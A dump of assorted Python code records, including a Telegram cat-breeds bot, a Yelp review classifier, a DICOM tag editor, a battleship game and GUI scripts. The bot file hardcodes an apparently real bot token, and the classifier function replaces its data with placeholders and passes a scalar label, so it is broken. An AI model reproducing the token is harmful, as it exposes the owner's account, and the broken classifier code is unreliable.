do_velocity=False)\n this_looper.ms = ms\n\n TL4.loops[this_simname].big_loop=this_looper\nsim_list=[this_simname]\n\nif 'ht' not in dir():\n ht={}\nfor this_simname in sim_list:\n if this_simname not in ht:\n ht[this_simname] = CHT.hull_tool(TL4.loops[this_simname])\n ht[this_simname].make_hulls()\n ht[this_simname].make_overlaps()\n\nif 'st' not in dir():\n import supersets\n reload(supersets)\n st={}\n for this_simname in sim_list:\n st[this_simname] = supersets.superset( TL4.loops[this_simname], ht[this_simname])\n st[this_simname].find()\n\nif 'new_looper' not in dir() :\n import otherones\n reload(otherones)\n print('make new one')\n\n core_list=None\n #core_list=np.unique(ht[this_simname].this_looper.tr.core_ids)\n\n for simname in sim_list:\n superset = None; name='has_neighbor'\n superset = st[simname]; name='no_neighbor'\n new_looper=otherones.find_other_ones(new_simname,ht[this_simname],core_list=core_list,superset=superset)\n outname = \"otherones_%s_%s_b.h5\"%(this_simname,name)\n if not os.path.exists(outname):\n print(\"SAVING FILE\", outname)\n tracks_read_write.save_loop_trackage_only( new_looper, outname)\n if not os.path.exists(boxname):\n new_looper.box.write(boxname)\n\n\n \nif 1:\n import otherones_hair\n reload(otherones_hair)\n core_loop = TL4.loops[this_simname]\n core_list=None\n #core_list =np.unique(ht[this_simname].this_looper.tr.core_ids)[:1]\n IM = otherones_hair.images(new_looper, core_loop)\n IM.run(frames=[0, core_loop.target_frame], core_list=core_list, output_prefix=this_simname)#,core_list=[3])\n #IM.run(frames=[0, core_loop.target_frame])#,core_list=[3])\n #IM.run(frames=[0,118])\n#hd = hair_dryer.hair_tool( this_looper )\n#hd.run()\n","sub_path":"other_particles/otherones_build1.py","file_name":"otherones_build1.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"146910308","text":"__author__ = 'sarangis'\n\nfrom mongodb import *\nfrom parallels import *\nfrom bokeh.plotting import figure\nfrom collections import OrderedDict\nfrom bokeh.charts import Bar, output_file, show\nfrom parallel_nlp import *\nfrom sklearn_usage import *\nimport timeit\n\ndef test_database():\n mongo_helper = MongoDBHelper('yelp')\n five_star_reviews = mongo_helper.reviews.query().filter(stars = 5).count().execute().get()\n\n four_star_reviews = mongo_helper.reviews.query().filter(stars = 4).count().execute().get()\n\n three_star_reviews = mongo_helper.reviews.query().filter(stars = 3).count().execute().get()\n\n two_star_reviews = mongo_helper.reviews.query().filter(stars = 2).count().execute().get()\n\n one_star_reviews = mongo_helper.reviews.query().filter(stars = 1).count().execute().get()\n\n xyvalues = OrderedDict()\n xyvalues[\"xy\"] = [one_star_reviews, two_star_reviews, three_star_reviews, four_star_reviews, five_star_reviews]\n x_labels = [\"1 star\", \"2 star\", \"3 star\", \"4 star\", \"5 star\"]\n\n bar = Bar(xyvalues, x_labels, title=\"Review Stars\", xlabel=\"Stars\", ylabel=\"Review\")\n\n output_file(\"reviews.html\")\n\n show(bar)\n\ndef use_my_count_vectorizer():\n # str = \"Well, the canonical approach in Python is to not check the type at all (unless you're debugging).\"\n # str_tokenized = remove_punct(str)\n\n mongo_helper = MongoDBHelper('yelp')\n\n reviews = []\n five_star_review_txt_cursor = mongo_helper.reviews.query().filter(stars = 5).projection(text=1, _id=0).limit(18000).execute().get_cursor() #.dataframe()\n\n for doc in 
five_star_review_txt_cursor:\n reviews.append(doc[\"text\"])\n\n par_count_vec = ParCountVectorizer()\n par_count_vec.map(reviews)\n\n #for trigram, freq in par_count_vec.trigram_freq.items():\n # print(\"%s:%d\" % ((trigram[0] + \" \" + trigram[1] + \" \" + trigram[2]), freq))\n\n import operator\n sorted_trigrams = sorted(par_count_vec.trigram_freq.items(), key=operator.itemgetter(1))\n top_200 = sorted_trigrams[-200:]\n for i in top_200:\n print(\"%s:%d\" % ((i[0][0] + \" \" + i[0][1] + \" \" + i[0][2]), i[1]))\n\n # for bigram, freq in par_count_vec.bigram_freq.items():\n # print(bigram, freq)\n\n # for unigram, freq in par_count_vec.unigram_freq.items():\n # print(unigram, freq)\n\ndef generate_word_cloud_from_reviews():\n # Doesn't work on Windows yet\n # mongo_helper = MongoDBHelper('yelp')\n # # my_query = mongo_helper.reviews.query().filter(Q(stars = 5) | Q(stars=4)).execute().dataframe()\n # # four_star_reviews = mongo_helper.reviews.query().filter(stars = 4).count().execute().get()\n # # print(my_query)\n # reviews_txt_df = mongo_helper.reviews.query().filter(stars = 4).projection(text=1, _id=0).execute().dataframe()\n # col = reviews_txt_df[\"text\"]\n #\n # txt = \"\"\n # for line in col:\n # txt += \" \" + line\n #\n # from wordcloud import WordCloud\n # word_cloud = WordCloud().generate(txt)\n # word_cloud.to_file(\"wordcloud.png\")\n # plot = figure(width=1000, height=1000)\n # pix = np.array(word_cloud.to_image())\n # plot.image_rgba(image=[pix], x=[0], y=[0], dw=[10], dh=[10])\n # output_file(\"wordcloud.html\")\n pass\n\ndef par_clean_stopwords():\n clean_stopwords()\n\ndef create_sklearn_ngrams():\n from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\n from sklearn.naive_bayes import MultinomialNB\n from sklearn import metrics\n\n print(\"Reading Database\")\n mongo_helper = MongoDBHelper('yelp')\n five_star_review_txt_cursor = mongo_helper.reviews.query().filter(stars = 5).projection(text=1, _id=0).limit(18000).execute().get_cursor() #.dataframe()\n\n reviews = []\n for doc in five_star_review_txt_cursor:\n reviews.append(doc['text'].encode(\"utf-8\"))\n\n reviews = [\"test\", \"train\"] * 13500\n print(reviews)\n total = len(reviews)\n training_range = int(total * 0.75)\n test_range = int(total * 0.25)\n X_train_txt = (reviews[:training_range])\n X_test_txt = (reviews[test_range:])\n\n print(len(X_train_txt))\n\n vectorizer = TfidfVectorizer(min_df=2, ngram_range=(1, 3), stop_words='english', strip_accents='unicode', norm='l2')\n\n X_train = vectorizer.fit_transform(X_train_txt)\n X_test = vectorizer.transform(X_test_txt)\n\n nb_classifier = MultinomialNB(alpha=1,fit_prior=False).fit(X_train, 5)\n y_nb_predicted = nb_classifier.predict(X_test)\n\n print(\"MODEL: Multinomial Naive Bayes\\n\")\n\n print('The precision for this classifier is ' + str(metrics.precision_score(5, y_nb_predicted)))\n print('The recall for this classifier is ' + str(metrics.recall_score(5, y_nb_predicted)))\n print('The f1 for this classifier is ' + str(metrics.f1_score(5, y_nb_predicted)))\n print('The accuracy for this classifier is ' + str(metrics.accuracy_score(5, y_nb_predicted)))\n\n\nif __name__ == \"__main__\":\n create_sklearn_ngrams()\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"306767577","text":"'''\nMIT License\n\nCopyright (c) 2017 Johan Kinnander\n\nPermission is hereby granted, free of charge, to any 
person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\nimport pygame\nfrom pygame.compat import geterror\n\nclass RoverSprite(pygame.sprite.Sprite):\n\timage_path = \"assets/rover.bmp\"\n\n\tdef __init__(self):\n\t\tpygame.sprite.Sprite.__init__(self)\n\n\t\ttry:\n\t\t\tself.image = pygame.image.load(self.image_path)\n\t\texcept pygame.error:\n\t\t\tprint(\"Unable to load image: \" + self.image_path)\n\t\t\traise SystemExit(str(geterror()))\n\n\t\tself.image = self.image.convert()\n\t\tcolorkey = self.image.get_at((0,0))\n\t\tself.image.set_colorkey(colorkey)\n\t\tself.original = self.image\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = 0,0\n\t\tself.orientation = 0\n\n\tdef moveTo(self, x, y):\n\t\tself.rect.topleft = x, y\n\n\tdef setOrientation(self, orientation):\n\t\tcenter = self.rect.center\n\n\t\tself.orientation = orientation\n\n\t\trotate = pygame.transform.rotate\n\t\tself.image = rotate(self.original, self.orientation)\n\t\tself.rect = self.image.get_rect(center=center)\n","sub_path":"visualization/rover_sprite.py","file_name":"rover_sprite.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"319056057","text":"import telebot\nfrom telebot import types\nfrom topic_11_telegram_bot.examples.cats.cat_breeds_info import *\n\ntoken = '1184152928:AAFvsnRFoML33KdHGu4xSx_GgQXAZrDueK0'\nbot = telebot.TeleBot(token)\n\n\ndef get_formatted_answer_str(answer_dict):\n    return \"Size: {Size}\\n\\nColor: {Color}\\n\\nInfo: {Info}\".format(**answer_dict)\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n    markup = types.InlineKeyboardMarkup()\n    markup.add(types.InlineKeyboardButton(text='Exotic Shorthair', callback_data=1))\n    markup.add(types.InlineKeyboardButton(text='Manx', callback_data=2))\n    markup.add(types.InlineKeyboardButton(text='Siberian', callback_data=3))\n\n    # Without using html\n    send_mess_start = f\"Hi {message.from_user.first_name}!\\nWhich cat would you like to learn about?\"\n    bot.send_message(message.chat.id, send_mess_start, reply_markup=markup)\n\n    # Using html\n    # send_mess_start = f\"Hi {message.from_user.first_name}!\\nWhich cat would you like to learn about?\"\n    # bot.send_message(message.chat.id, send_mess_start, parse_mode='html', reply_markup=markup)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef query_handler(call):\n    bot.answer_callback_query(callback_query_id=call.id, text='Brief information')\n    answer = ''\n    img = ''\n    if call.data == '1':\n        answer = get_formatted_answer_str(exotic_shorthair)\n        img = 'img/Exotic Shorthair Cat Breed.jpg'\n    elif call.data == '2':\n        answer = get_formatted_answer_str(manx)\n        img = 'img/Manx Cat.jpg'\n    elif call.data == '3':\n        answer = get_formatted_answer_str(siberian)\n        img = 'img/Siberian Cat Breed.jpg'\n\n    if img:\n        img = open(img, 'rb')\n        bot.send_photo(call.message.chat.id, img, answer)\n        img.close()\n    else:\n        bot.send_message(call.message.chat.id, answer)\n\n\n@bot.message_handler(commands=['info'])\ndef info(message):\n    send_mess_info = 'I can tell you about several breeds of cats.' \\\n                     '\\nYou can control me by sending these commands:\\n' \\\n                     '\\n/start - start the bot and show the list of cats' \\\n                     '\\n/help - explains how to start the bot'\n\n    bot.send_message(message.chat.id, send_mess_info, parse_mode='html')\n\n\n@bot.message_handler(commands=['help'])\ndef help_com(message):\n    send_mess_help = f\"Hi {message.from_user.first_name}!\\nSend the /start command\"\n    bot.send_message(message.chat.id, send_mess_help, parse_mode='html')\n\n\nif __name__ == '__main__':\n    print('Starting bot...')\n    bot.polling(none_stop=True, interval=0)\n","sub_path":"topic_11_telegram_bot/examples/cats/cats_bot.py","file_name":"cats_bot.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"434275366","text":"from django.db.models import Prefetch\nfrom fb_post.models.post import Post\nfrom fb_post.models.comment import Comment\nfrom .conversion_function_utils import get_post_dictionary\nfrom .validations import is_valid_user_id\n\n\n# Task-14\ndef get_user_posts(user_id, offset, limit):\n\n    is_valid_user_id(user_id)\n\n    comment_queryset = Comment.objects.select_related('commented_by')\\\n        .prefetch_related('reactions')\n\n    post_objs = Post.objects.filter(posted_by_id=user_id)\\\n        .select_related('posted_by')\\\n        .prefetch_related(\n            'reactions',\n            Prefetch('comments', queryset=comment_queryset))\\\n        [offset:offset+limit]\n\n    posts_list = [\n        get_post_dictionary(post_obj)\n        for post_obj in post_objs\n    ]\n\n    return posts_list\n","sub_path":"utils/get_user_posts.py","file_name":"get_user_posts.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"90534102","text":"def battleship(nmoves,ocean_size):\n    from random import randint\n    board = []\n    for x in range(ocean_size):\n        board.append([\"O\"] * ocean_size)\n    \n    def print_board(board):\n        for row in board:\n            print (\" \".join(row))\n    \n    print (\"Let's play Battleship!\")\n    print_board(board)\n    \n    def random_row(board):\n        return randint(0, len(board) - 1)\n    \n    def random_col(board):\n        return randint(0, len(board[0]) - 1)\n    ship_row = random_row(board)\n    ship_col = random_col(board)\n    \n    # Everything from here on should go in your for loop!\n    # Be sure to indent four spaces!\n    print('You have '+ str(nmoves) + ' moves')\n    for turn in range(nmoves): \n        guess_row = int(input(\"Guess Row:\"))\n        guess_col = int(input(\"Guess Col:\"))    \n        if guess_row == ship_row and guess_col == ship_col:\n            print (\"Congratulations! 
You sunk my battleship!\")\n break\n else:\n if (guess_row < 0 or guess_row > ocean_size-1) or (guess_col < 0 or guess_col > ocean_size-1):\n print (\"Oops, that's not even in the ocean.\")\n elif(board[guess_row][guess_col] == \"X\"):\n print (\"You guessed that one already.\")\n else:\n print (\"You missed my battleship!\")\n board[guess_row][guess_col] = \"X\"\n # Print (turn + 1) here!\n print (\"Turn \"+ str(turn))\n print_board(board)\n if turn == (nmoves-1):\n print('-------')\n board[ship_row][ship_col] = \"%\"\n print_board(board)\n print (\"Game Over\")\n \n\nif __name__ == \"__main__\":\n\tbattleship(5,10)\n","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175486030","text":"import random\nimport math\n\nclass Schaffer():\n\tdef __init__(self):\n\t\tself.name = \"Schaffer\"\n\t\tself.x1 = random.uniform(-10, 10)\n\t\tself.inputs = [\tself.x1 ]\n\t\tself.outputs = []\n\t\tself.eqs = [ lambda inputs: \n\t\t\t\t\tmath.pow(inputs[0], 2),\n\t\t\t\tlambda inputs:\n\t\t\t\t\t(math.pow(inputs[0], 2) - 2)]\n\t\t\n\tdef objectives(self):\n\t\tinlist = self.inputs[:]\n\t\toutlist = []\n\t\tfor lamb in self.eqs:\n\t\t\ttemp = lamb(inlist)\n\t\t\toutlist.append(temp)\n\t\tself.outputs = outlist\n\n\t\t\t\t\t\t\t\n\t\t\n#x = Schaffer()\n#x.inputs[0] = 10\n#test = x.objectives()\n#print x.inputs\n#print test\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228624447","text":"from lib.job.Task import Task\n\n\nclass MapTask(Task):\n\n TYPE = 'map_task'\n\n @staticmethod\n def get_name(name):\n return '{}_{}'.format(MapTask.TYPE, name)\n\n @staticmethod\n def update_meta(request, document):\n actual_doc = document.get_document()\n added_requests = [(tuple(x) if isinstance(x, list) else x) for x in actual_doc.get('requests', ())]\n added_requests.append(request)\n actual_doc.update(requests=list(set(added_requests)))\n document.update(actual_doc)\n","sub_path":"lib/job/map/google/MapTask.py","file_name":"MapTask.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63045497","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimages = []\nimg = cv2.imread('water_coins.jpg')\ncv2.imshow('intitial_image' , img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n#images.append(('gray',gray))\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n#images.append(('thresh',thresh))\n\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n\n# sure background area\nsure_bg = cv2.dilate(opening,kernel,iterations=3)\n#images.append(('sure_bg',sure_bg))\n\n# Finding sure foreground area\ndist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\nret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\n#images.append(('sure_fg',sure_fg))\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv2.subtract(sure_bg,sure_fg)\n#images.append(('unknown_area', unknown))\n\n# Marker labelling\nret, markers = cv2.connectedComponents(sure_fg)\n\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n\n# Now, 
mark the region of unknown with zero\nmarkers[unknown==255] = 0\n#images.append(('markers',markers))\n\nmarkers = cv2.watershed(img,markers)\nimg[markers == -1] = [255,0,0]\n#images.append(('markers', markers))\nimages.append(('final', img))\n\n#retval\t=\tcv.ximgproc.createSuperpixelSLIC(\timage[, algorithm[, region_size[, ruler]]]\t)\n\n\n\nfor x in range(0,len(images)):\n    cv2.imshow(images[x][0] ,images[x][1])\n    cv2.waitKey(0)\n    cv2.destroyAllWindows()\n","sub_path":"coin_test.py","file_name":"coin_test.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"625439227","text":"\"\"\"\nIANR - Task2 items 1-4\nexample use cases\n1) python dcmutil.py dcmfile=C:\\\DICOM\\\IANR.dcm\n2) python dcmutil.py dcmfile=C:\\\DICOM\\\IANR.dcm updatename=JoeBloggs updateage=17 updategender=F\n3) python dcmutil.py dcmfolder=C:\\\DICOM\\\brain\n4) python dcmutil.py dcmfolder=C:\\\DICOM\\\brain applyage=true\n\"\"\"\n\nimport os\nimport sys\nimport pydicom\nfrom datetime import datetime\n\ninputArgs = {'dcmfile': None, 'dcmfolder': None, 'updatename': None, 'updateage': None, 'updategender': None, 'applyage': None}\n\nif len(sys.argv) >= 2:\n    for user_input in sys.argv[1:]: # iterate over argv[1:] (argv[0] is the program name)\n        if \"=\" not in user_input:\n            print('Args supplied are not in the correct format.... name=value')\n            continue\n        varname = user_input.split(\"=\")[0]\n        varname = varname.lower()\n        varvalue = user_input.split(\"=\")[1]\n        if varname in inputArgs:\n            inputArgs[varname] = varvalue\n        else:\n            print('\\n@@@ Ignoring input Args: ', user_input)\n\n    #print(inputArgs)\nelse:\n    print(\"No options supplied\")\n    exit(0)\n\ndcmFile = inputArgs.get(\"dcmfile\")\ndcmFolder = inputArgs.get(\"dcmfolder\")\nupdateName = inputArgs.get('updatename')\nupdateAge = inputArgs.get('updateage')\nupdateGender = inputArgs.get('updategender')\napplyAge = inputArgs.get('applyage')\n\n\n### read and print ALL data ###\ndef readDcmTags(dcmFile, display):\n    dataset = pydicom.filereader.dcmread(dcmFile)\n    if display:\n        print(dataset)\n    return (dataset)\n\n\ndef modifyTags(dcmFile, updateName, updateAge, updateGender):\n    dataset = readDcmTags(dcmFile, False)\n    dataset.PatientName = updateName\n    dataset.PatientSex = updateGender\n    dataset.PatientAge = updateAge\n    print(\"Updated: Name:{} - Gender:{} - Age:{}\".format(dataset.PatientName, dataset.PatientSex, dataset.PatientAge))\n    ### Update / write DCM file\n    dataset.save_as(dcmFile, True)\n    ### Verify save is correct\n    updateDataset = readDcmTags(dcmFile, False)\n    print(\"NewRead: Name:{} - Gender:{} - Age:{}\".format(updateDataset.PatientName, updateDataset.PatientSex, updateDataset.PatientAge))\n\ndef updateFolderContentMetadata(dcmFolder):\n    current_date = datetime.today().strftime('%Y%m%d')\n    current_time = datetime.today().strftime('%H%M%S')\n    print(\"Current Date: {} Time: {}\".format(current_date, current_time))\n\n    for file in os.listdir(dcmFolder):\n        current_file = os.path.join(dcmFolder, file)\n        folderFileData = pydicom.filereader.dcmread(current_file)\n        print(\"Current Content Metadata: \", current_file, folderFileData.ContentDate, folderFileData.ContentTime)\n        folderFileData.ContentDate = current_date\n        folderFileData.ContentTime = current_time\n        #Save data back\n        folderFileData.save_as(current_file, True)\n        #reload to verify\n        updatedFileData = pydicom.filereader.dcmread(current_file)\n        print(\"Updated Content Metadata: \", current_file, updatedFileData.ContentDate, updatedFileData.ContentTime)\n\ndef getAge(PatientBirthDate, StudyDate):\n    BirthDate = datetime.strptime(PatientBirthDate, \"%Y%m%d\")\n    StudyDate = datetime.strptime(StudyDate, \"%Y%m%d\")\n    Age = StudyDate - BirthDate\n    return (int(Age.days/365.25))\n\ndef applyPatientAgeAtStudyDate(dcmFolder):\n    for file in os.listdir(dcmFolder):\n        current_file = os.path.join(dcmFolder, file)\n        folderFileData = pydicom.filereader.dcmread(current_file)\n        print(\"Current File:{} Age:{} DOB:{} Study:{}\".format( current_file, folderFileData.PatientAge, folderFileData.PatientBirthDate, folderFileData.StudyDate))\n        ageAtStudy = getAge(folderFileData.PatientBirthDate, folderFileData.StudyDate)\n        folderFileData.PatientAge = str(ageAtStudy)\n        #Save data back\n        folderFileData.save_as(current_file, True)\n        #reload to verify\n        updatedFileData = pydicom.filereader.dcmread(current_file)\n        print(\"Updated File:{} Age:{} DOB:{} Study:{}\".format( current_file, updatedFileData.PatientAge, updatedFileData.PatientBirthDate, updatedFileData.StudyDate))\n\n\n## read tags only ##\nif dcmFile and dcmFolder==None and updateName==None and updateAge==None and updateGender==None and applyAge==None:\n    readDcmTags(dcmFile, True)\n\n## modify tags as ##\nif dcmFile and updateName and updateAge and updateGender:\n    modifyTags(dcmFile, updateName, updateAge, updateGender)\n\n## modify Multiple Files from folder ##\nif dcmFolder and not dcmFile and not applyAge:\n    updateFolderContentMetadata(dcmFolder)\n\n## modify Age based on Study Date across folder ##\nif applyAge != None:\n    applyAge=applyAge.lower()\n    if dcmFolder and applyAge==\"true\" and not dcmFile:\n        applyPatientAgeAtStudyDate(dcmFolder)\n\n","sub_path":"dcmUtil.py","file_name":"dcmUtil.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"148107917","text":"import pyqtgraph as pg\nfrom PySide.QtCore import QEvent\nfrom PySide.QtGui import QMainWindow, QMessageBox, QMdiArea\nfrom pyqtgraph import FileDialog\n\nfrom inspector.core import context, console_service\nfrom inspector.module import ctx\nfrom inspector.trace.H5Trace import H5TraceSet\nfrom inspector.trace.HDF5Trace import HDF5TraceSet\nfrom inspector.trace.Trace import TraceSetSupport, TraceSet\nfrom inspector.trace.TrsTrace import TrsTraceSet\nfrom inspector.ui.MainWindow import Ui_MainWindow\nfrom inspector.widget.AttributeFileDialog import AttributeFileDialog\nfrom inspector.widget.LinearRegionPlotWidget import LinearRegionPlotWidget\nfrom inspector.widget.ModulesDialog import ModulesDialog\nfrom inspector.widget.StatusBar import RichStatusBar\nfrom inspector.widget.ToolBar import ToolBarModule\nfrom inspector.widget.TraceDisplay import TraceMdiArea, ToolBarTrace\nfrom inspector.window.ModuleEditWindow import ModuleEditWindow\n\n\nclass MainWindow(Ui_MainWindow, QMainWindow):\n    \"\"\"\n    Main window\n    \"\"\"\n\n    def initSignal(self):\n        self.actionOpen.triggered.connect(self.openTrace)\n        self.actionSaveAs.triggered.connect(self.saveAs)\n        self.mdiAreaTrace.signalSubWindowChanged.connect(self.tcAboutEnable)\n        self.toolBarModule.toolButtonSelect.clicked.connect(self.showModulesDialog)\n        self.toolBarModule.toolButtonNew.clicked.connect(self.showNewModule)\n\n    def initModuleEditWindow(self):\n        self.moduleEditWindow = ModuleEditWindow(self)\n\n    def initLayout(self):\n        self.tabifyDockWidget(self.dockWidgetLog, self.dockWidgetOut)\n        self.tabifyDockWidget(self.dockWidgetLog, self.dockWidgetTrace)\n        self.dockWidgetLog.raise_()\n\n    def initToolBar(self):\n        self.toolBarTrace = ToolBarTrace()\n        self.toolBar.addWidget(self.toolBarTrace)\n        self.toolBar.addSeparator()\n        self.toolBarModule = ToolBarModule(ctx)\n        self.toolBar.addWidget(self.toolBarModule)\n        self.toolBar.addSeparator()\n        self.toolBar.addAction(self.actionHelp)\n\n    def initStatusBar(self):\n        self.setStatusBar(RichStatusBar())\n\n    def initMdiArea(self):\n        self.mdiAreaTrace = TraceMdiArea(self.overview_trace, self.toolBarTrace, self.statusBar(), parent=self.centralwidget)\n        self.mdiAreaTrace.setViewMode(QMdiArea.SubWindowView)\n        self.mdiAreaTrace.setObjectName(\"mdiAreaTrace\")\n        self.verticalLayoutMain.addWidget(self.mdiAreaTrace)\n\n    def initOverview(self):\n        self.overview_trace = LinearRegionPlotWidget()\n        self.overview_trace.setVisible(False)\n        self.verticalLayoutTrace.addWidget(self.overview_trace)\n\n    def initTraceSetSupport(self):\n        TraceSetSupport.register('trs', TrsTraceSet, 'TRS Trace File')\n        TraceSetSupport.register('hdf5', HDF5TraceSet, 'HDF5 Trace File')\n        TraceSetSupport.register('h5', H5TraceSet, 'HDF5 Trace File')\n\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n        # Modify pyqtgraph default configuration\n        # pg.setConfigOption('background', 'w')\n        # pg.setConfigOption('foreground', 'k')\n        pg.setConfigOptions(antialias=True)\n        # self.__trace_overview = TraceOverview(self.verticalLayoutTrace)\n        self.context = context.Context(self)\n        self.initLayout()\n        self.initToolBar()\n        self.initOverview()\n        self.initStatusBar()\n        self.initMdiArea()\n        # signal\n        self.initSignal()\n        # script\n        self.server = console_service.start_service()\n        self.initModuleEditWindow()\n        self.initModulesDialog()\n        # self.trace_sets = {} # type:typing.Dict[TraceMdiSubWindow, TraceSet]\n        self.__opened_file = {}\n        self.__file_index_sed = 0\n        self.initTraceSetSupport()\n        self.initContext()\n\n    # def __enable_toolbar_canvas_ctl(self, n, w):\n    #     self.toolBarTrace.set_enable(n > 0)\n    #     if n <= 0:\n    #         self.toolBarTrace.set_value(1, 1, False)\n\n    def closeEvent(self, event: QEvent):\n        reply = QMessageBox.question(self, 'Confirm Exit', 'Are you sure you want to exit?', QMessageBox.Yes,\n                                     QMessageBox.No)\n        if reply == QMessageBox.Yes:\n            self.server.stop()\n            self.server.quit()\n            self.server.wait()\n            self.moduleEditWindow.close()\n            event.accept()\n        else:\n            event.ignore()\n\n    def openTrace(self):\n        path = AttributeFileDialog(filter=TraceSetSupport.getFilters()).getOpenFileName()\n\n        if path is None:\n            return\n        traceSet = TraceSetSupport.newInstance(path.split('.')[-1], path)\n        if traceSet is not None:\n            self.mdiAreaTrace.addTraceSet(traceSet)\n            self.dockWidgetTrace.raise_()\n        else:\n            # traceSet = MemTraceSet()\n            # traceSet.appendTrace([0,1,2,3],[1,2,3,4],'xx', 'yy', 1, 1, 0)\n            # self.mdiAreaTrace.addTraceSet(traceSet)\n            # self.dockWidgetTrace.raise_()\n            QMessageBox().warning('Warning', 'Unsupported file type.')\n\n    def saveAs(self):\n        path = FileDialog.getSaveFileName(filter=TraceSetSupport.getFilters())[0]\n        if path is None or path == '':\n            return\n        p = path.split('.')[-1]\n        tTraceSet = TraceSetSupport.newInstance(p, path, read=False)\n        sTraceSet = self.mdiAreaTrace.activeSubWindow().traceSet # type: TraceSet\n        traces = []\n        for i in range(sTraceSet.getTraceCount()):\n            traces.append(sTraceSet.getTrace(i))\n        tTraceSet.setAttribute(sTraceSet.getAttribute())\n        tTraceSet.setTraces(traces)\n        tTraceSet.saveFile()\n\n    def showNewModule(self):\n        self.moduleEditWindow.show()\n        self.moduleEditWindow.raise_()\n\n    # def onclick(self, w):\n    #     print(w)\n\n    def initContext(self):\n        ctx.textBrowserOut = self.textBrowserOut\n        ctx.textBrowserLog = self.textBrowserLog\n        ctx.setMdiAreaTrace(self.mdiAreaTrace)\n        ctx.setStatusBar(self.statusBar())\n\n    def tcAboutEnable(self, count):\n        \"\"\"\n        Enable or disable controls that depend on the number of open traces\n        :param count:\n        :return:\n        \"\"\"\n        enable = count > 0\n        self.toolBarModule.toolButtonSelect.setEnabled(enable)\n        self.toolBarModule.toolButtonNew.setEnabled(enable)\n        self.actionSaveAs.setEnabled(enable)\n        self.actionSave.setEnabled(enable)\n\n    def initModulesDialog(self):\n        self.modulesDialog = ModulesDialog()\n\n    def showModulesDialog(self):\n        self.modulesDialog.initModules()\n        self.modulesDialog.exec_()\n        t, v, p = self.modulesDialog.selectedModule\n        self.toolBarModule.setModule(t, v, p)","sub_path":"inspector/window/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":6690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"538273289","text":"import os\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom logging import Formatter\nimport logging.config\n\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n# create the application instance :)\n# here for availability in other packages\napp = Flask(__name__)\n\n\nfrom flask import json\nfrom flask_restful_swagger_2 import Api\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom flasktemplate.services.ExempleResource import ExempleResource\nfrom flasktemplate.utils.db import Db\n\nlogger = logging.getLogger(__name__)\n\n##########################\n# Application configuration\n##########################\n\napp.config.from_object(__name__) # load config from this file , flaskr.py\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n    DATABASE=os.path.join(app.root_path, 'flaskr.db'),\n    SECRET_KEY='development key',\n    USERNAME='admin',\n    PASSWORD='default'\n))\n\n# conf from env var\napp.config.from_envvar('FLASKR_SETTINGS', 